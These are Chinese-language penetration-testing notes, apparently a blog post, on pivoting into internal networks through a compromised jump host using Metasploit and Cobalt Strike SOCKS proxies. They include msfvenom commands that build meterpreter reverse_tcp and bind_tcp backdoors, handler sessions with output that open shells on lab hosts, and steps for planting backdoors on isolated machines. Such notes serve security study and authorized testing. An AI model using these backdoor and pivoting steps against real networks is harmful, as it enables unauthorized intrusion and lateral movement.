内网代理技术总结

代理技术就是解决外网和内网的通信问题，例如，我的一个外网主机想要找到另外一个网段下的一个内网主机，理论上是无法找到的。如果我们想要进行通信的话就要使用代理技术。我们可以找到一个与目标内网主机在容易网段下可以通信的外网主机，在上面做一个代理转发就可以找到内网主机。

MSF和CS自带模块进行代理转发

我们可以使用msf的auxiliary/server/socks_proxy模块和cs的建立sock连接模块来建立，建立好连接之后我们将其中的ip和端口信息配置到代理转发软件中，然后将我们的渗透工具添加到代理工具中就可以实现在我们本机对于内网不出网的主机进行测试

MSF模块

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.135 LPORT=9998 -f exe -o /testlyz2/9998.exe

先试用控制主机控制到内网中可以进行外网通信的主机，再使用控制主机的msf控制到目标内网主机，在主机上使用相关模块建立与内网连接的节点信息，建立好节点后，我们在攻击主机上通过代理连接到跳板机上与目标主机进行通信，通信正常后使用渗透工具进行攻击（因为msf建立的里连接只有对msf有效对其他的渗透工具无效）

使用msf模块进行攻击需要进行路由添加

在win7上安装一个节点，安装节点的目的就是使用节点去访问不能访问的内网主机，因为在内网环境中，目标主机没有出网路由就是我们不法与目标主机建立连接，如果想要进行渗透测试的话就需要在win7上安装渗透测试工具进行测试，显然这样做不显示，为了可以在本机上进行渗透测试我们就需要使用代理节点来进行连接无法连接的内网主机

使用msf模块在已经windows7上面建立一个网络的连接节点

添加路由（PS：msf要添加路由 cs不需要添加路由）

使用这个语句进行添加路由

添加已有之后就可以和本地的198网段进行通讯，做完这一步cs就可以直接和内网主机进行通信，但是其他应用程序还是不可以通信，这是因为其他工具不享有这个路由

建立节点--建立一个服务器去连接内网主机（和扶墙一个原理）

在一个和此内网主机不互联的外网主机使用代理工具，连接我们控制主机建立的节点服务器

在msf中use auxiliary/server/socks_proxy这个模块设置代理

设置好代理后在攻击机上使用工具去连接这个代理（SocketsCap）

设置好代理后就检测代理的联通性

在节点主机上通过工具建立连接去连接节点服务器

绑定应用服务就可以访问到内网主机中的资源信息

CS模块

不用添加路由

先使用cs作为一个后门，使用cs进行连接上线

然后点击目标右击建立socket代理

将代理的服务端口记录下来配置到攻击主机的代理服务器上即可

检测网络的联通性

我们控制一个主机一般是使用cs或者是msf，一般情况下如果是cmd权限的话对于后期操作不方便，也需要将权限转移到cs或者msf上面

然后配置代理选项

最后我们就可以通过工具对于不出网的主机进行正常的流量连接并进行渗透测试

CS和MSF控制上线--正向连接

CS模块

在实战情况下我们在内网环境下会遇到主机没有网络也即不出网的问题。为此我们需要使用和其在同一个网段下的主机对其进行正向主动连接--正向连接

正反向连接

正向：后门执行后将数据传递给本地的2222端口，控制器连接主机的2222端口

反向：后门执行后将数据传递给控制主机的2222端口，控制器监听自己的2222端口

由于内网的主机没有出网的接口。因此不可以使用反向连接，为此只能使主机连接本地的2222端口，然后使用跳板机去连接内网主机的2222端口

正向连接--生成本地后门

案例分析

先生成一个监听本地端口的后门程序

将后门上传到没有网络的内网主机
执行后门后，在控制的跳板机会话中的cs控制台输入connect 192.168.198.207（不出网主机）就会实现上线（我认为这一步体现了正向连接的精髓所在）

查看网络拓扑图

可以看到我们利用跳板机连接到了内网的一台主机

MSF模块

生成blind正向连接的后门

在上一步建立好代理的基础上，我们使用msf生成一个blind正向连接的后门

┌──(root㉿kali)-[~] └─# msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > /testlyz/bendi2.exe 生好后门后在代理中设置对话

先设控制一个受控主机

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > run

查看会话信息

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessionsActive sessions
===============Id  Name  Type                  Information       Connection--  ----  ----                  -----------       ----------1         meterpreter x86/wind  LYZ\Lenovo @ LYZ  192.168.198.135:6666 -> 19ows                                     2.168.198.1:55989 (192.168.198.1)

看到受控主机已经加入session会话

我们在生成一个监听本地端口的本地后门

┌──(root㉿kali)-[~]
└─# msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > /testlyz/bendi2.exe
设置监听模块

msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set rhost 192.168.198.207
rhost => 192.168.198.207
msf6 exploit(multi/handler) > set lport 3333
lport => 3333
msf6 exploit(multi/handler) > run[*] Started bind TCP handler against 192.168.198.207:3333
[*] Sending stage (175686 bytes) to 192.168.198.207
[*] Meterpreter session 2 opened (192.168.198.135:46687 -> 192.168.198.207:3333) at 2024-04-13 11:32:51 +0800

设置好然后在目标主机上执行后门上线